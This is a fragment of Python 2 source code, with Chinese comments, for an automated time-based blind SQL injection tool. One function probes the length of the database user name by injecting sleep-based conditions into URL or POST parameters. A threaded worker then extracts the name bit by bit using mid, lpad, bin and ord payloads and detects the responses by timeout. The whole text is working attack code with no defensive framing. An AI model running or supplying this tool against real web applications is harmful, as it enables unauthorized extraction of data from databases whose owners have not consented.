def getlen(url,data=None,para=None): i=0 if data==None: while True: print "[+] Checking: %s " %i payload = url+"'+or+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23" #print payload html=httpres(payload) flag="timeout" if flag in html: print u"长度为:%s"%i return i i+=1 else: while True: print "[+] Checking: %s " %i a=format(data) a[para]=a[para]+"'or sleep(if(length((select user()))="+str(i)+",1,0))#" post_data = urllib.urlencode(a) #print payload html=httpres(url,post_data) flag="timeout" if flag in html: print u"长度为:%s"%i return i i+=1
def run(self): global res #用来存二进制 url=self.url j=self.str x=self.x para=self.para data=self.data if data==None: payload = url+"'or+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23" html=httpres(payload) flag="timeout" if flag in html: res[str(j)] = 1 else: res[str(j)] = 0 else: a=format(data) a[para]=a[para]+"'or if(1=(mid(lpad(bin(ord(mid((select user())," + str(x) + ",1))),8,0),"+ str(j) + ",1)),sleep(2),0)#" post_data = urllib.urlencode(a) html=httpres(url,post_data) flag="timeout" if flag in html: res[str(j)] = 1 else: res[str(j)] = 0